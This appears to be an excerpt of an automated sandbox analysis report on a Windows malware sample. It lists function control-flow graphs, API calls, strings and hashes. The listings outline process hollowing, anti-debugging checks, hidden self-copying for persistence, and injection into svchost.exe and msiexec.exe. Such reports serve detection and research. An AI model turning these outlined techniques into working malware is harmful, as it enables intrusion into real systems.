7ff7dbd52751-7ff7dbd5275f 288->289 290 7ff7dbd5288e 289->290 291 7ff7dbd52765-7ff7dbd52798 289->291 290->286 292 7ff7dbd5279c-7ff7dbd5286f ReadProcessMemory WriteProcessMemory 291->292 293 7ff7dbd5279a 291->293 295 7ff7dbd52889 292->295 296 7ff7dbd52871-7ff7dbd52884 VirtualFree 292->296 293->289 295->290 296->234
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: 2b7d6086123a64eb07d05fdb33156316ea74074a047eec94bda4df3ae2c22f26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9332EA3260CAC586E774DB19E8947AEB7A1FBC9B44F904136DA9D83B68DF3CD4448B10
                                                                                                                                                                                                                          Function 00007FF7DBD5345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 297 7ff7dbd5345c-7ff7dbd53472 call 7ff7dbd510a0 call 7ff7dbd5321c 302 7ff7dbd5347c-7ff7dbd534aa call 7ff7dbd54264 call 7ff7dbd53ce4 call 7ff7dbd53f14 297->302 303 7ff7dbd53474-7ff7dbd53476 ExitProcess 297->303 310 7ff7dbd534fb-7ff7dbd5350e call 7ff7dbd53f14 302->310 311 7ff7dbd534ac-7ff7dbd534bd call 7ff7dbd543a4 302->311 316 7ff7dbd5354c-7ff7dbd5355f call 7ff7dbd53f14 310->316 317 7ff7dbd53510-7ff7dbd53521 call 7ff7dbd543a4 310->317 318 7ff7dbd534bf-7ff7dbd534d0 call 7ff7dbd543a4 311->318 319 7ff7dbd534d2-7ff7dbd534d4 ExitProcess 311->319 329 7ff7dbd53561-7ff7dbd53572 call 7ff7dbd543a4 316->329 330 7ff7dbd535a2-7ff7dbd535b8 call 7ff7dbd53a74 call 7ff7dbd533ec 316->330 326 7ff7dbd5352b call 7ff7dbd5327c 317->326 327 7ff7dbd53523-7ff7dbd53525 ExitProcess 317->327 318->319 328 7ff7dbd534da call 7ff7dbd532ec 318->328 335 7ff7dbd53530-7ff7dbd53535 326->335 337 7ff7dbd534df-7ff7dbd534e4 328->337 339 7ff7dbd5357c call 7ff7dbd5327c 329->339 340 7ff7dbd53574-7ff7dbd53576 ExitProcess 329->340 349 7ff7dbd5360e-7ff7dbd536d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 330->349 350 7ff7dbd535ba-7ff7dbd535cb call 7ff7dbd543a4 330->350 341 7ff7dbd53537-7ff7dbd53542 Sleep 335->341 342 7ff7dbd53544-7ff7dbd53546 ExitProcess 335->342 344 7ff7dbd534f3-7ff7dbd534f5 ExitProcess 337->344 345 7ff7dbd534e6-7ff7dbd534f1 Sleep 337->345 348 7ff7dbd53581-7ff7dbd53586 339->348 341->335 345->337 351 7ff7dbd53588-7ff7dbd53593 Sleep 348->351 352 7ff7dbd53595-7ff7dbd53597 ExitProcess 348->352 355 7ff7dbd535cd-7ff7dbd535de call 7ff7dbd543a4 350->355 356 7ff7dbd535e0-7ff7dbd535e2 ExitProcess 350->356 351->348 355->356 359 7ff7dbd535e8 call 7ff7dbd532ec 355->359 361 7ff7dbd535ed-7ff7dbd535f2 359->361 362 7ff7dbd535f4-7ff7dbd535ff Sleep 361->362 363 7ff7dbd53601-7ff7dbd53603 ExitProcess 361->363 362->361
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                          • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                          • API String ID: 613740775-1953711635
                                                                                                                                                                                                                          • Opcode ID: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction ID: 7bc1d02335ad4e8b97b95c2784674a4ed88d5e506fa4d780a9d14b014f1f983e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a5e32be024098133c8fe6dcfe016820a41a9c533a74987b5c75148df4034c8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C61D620A0CA4391FA6CBB39A895A7EA2E0AF86711FD01937D45F861F5DF2DE4059730
                                                                                                                                                                                                                          Function 00007FF7DBD54264 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: 22913ba60b98153b1536a92fe97449f3459f758102b0e4d7c2b79b3fe6e36fa7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C631E33261CA8186E754AB59E49062EF7A0FBC6B90F905136FA8E43A78DF7CD4418B11
                                                                                                                                                                                                                          Function 00007FF7DBD538C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7DBD53784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetVolumeInformationW.KERNELBASE ref: 00007FF7DBD53801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: wsprintfW.USER32 ref: 00007FF7DBD538A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                          • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction ID: 5280a09d4017ca7b633fa7fd1a225e66a01d1d42f7bf6788cd81901c3f7d9770
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE11FC3172C98685EB64AB29F89476EA3A1FBC5B81FD05032DA4E43A39DF3CD4048710
                                                                                                                                                                                                                          Function 00007FF7DBD53A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7DBD53784
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: GetVolumeInformationW.KERNELBASE ref: 00007FF7DBD53801
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD53744: wsprintfW.USER32 ref: 00007FF7DBD538A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD5396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7DBD538C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DBD53AA9), ref: 00007FF7DBD53995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF7DBD53AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE ref: 00007FF7DBD53AC4
                                                                                                                                                                                                                          • CopyFileW.KERNELBASE ref: 00007FF7DBD53ADD
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32 ref: 00007FF7DBD53AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services
                                                                                                                                                                                                                          • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                          • Opcode ID: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                                          • Instruction ID: 5aa4bd83508e2622ce5d9bfa95869a8fe2a3958b53d20192a1926972bea7e6a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cabd95d3c80652fe8b367c9eb5d64b267906483226546c4ea9003bdd6899bef0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16014461B1C58692EB64EB28E4947AE93E0FB95744FD05433D64E835B8EF2CD24DCB10
                                                                                                                                                                                                                          Function 00007FF7DBD53744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: 4905ec94b6e1f36dcea39b1ca2a70d380db956d1c6484fc620f9818bfc48624a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3831092661C6C186D734EF64E4987AEB7B0FB85714F901136E68D87A68DB7DC508CF10
                                                                                                                                                                                                                          Function 00007FF7DBD5321C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: 74cbd54a51621d58b3327f6e2fda5ba8e59b83aa04a6dc456d3a46abeb5c9c9a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20F08220A0DA8681FB386B6DA44477DA7D0BF47B18FD00176D99E0A5B4CF2CE619DB31
                                                                                                                                                                                                                          Function 00007FF7DBD51050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 416 7ff7dbd51050-7ff7dbd5108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 678a0ae3596b6eeba8411973709d55b1ba189d660857107b6c45d45b2e76c233
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E00276918F8586C624AB19F88411EB7B4FBC9794FA04135EACD42B38DF3CC565CB14
                                                                                                                                                                                                                          Function 00007FF7DBD53B54 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 420 7ff7dbd53b54-7ff7dbd53b7a VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                                          • Instruction ID: 15a1f510f3683be041fffc645341f62269c06abaedd8cf0863f1303becf9ad14
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EC012B1F2A18083DB1CAF36E491E0A6A60B785740FA09029EA0247B94CA3EC2528F00
                                                                                                                                                                                                                          Function 00007FF7DBD53B24 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 417 7ff7dbd53b24-7ff7dbd53b33 418 7ff7dbd53b48-7ff7dbd53b4c 417->418 419 7ff7dbd53b35-7ff7dbd53b42 VirtualFree 417->419 419->418
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2163123038.00007FF7DBD51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7DBD50000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163084759.00007FF7DBD50000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163152420.00007FF7DBD55000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163176715.00007FF7DBD57000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163198305.00007FF7DBD58000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.2163217441.00007FF7DBD5A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff7dbd50000_616766F8886C145454191.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 8d2fde5e49be6f0b91f4d628e2a38713842a66ac5e7a7093d62e6f2bfcaa031e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDD01221E3894181E799AB2AE8C9B1DE3E1FBC5B44FD09036E6CA41574CF3CD0998F00

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF7DBD540E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
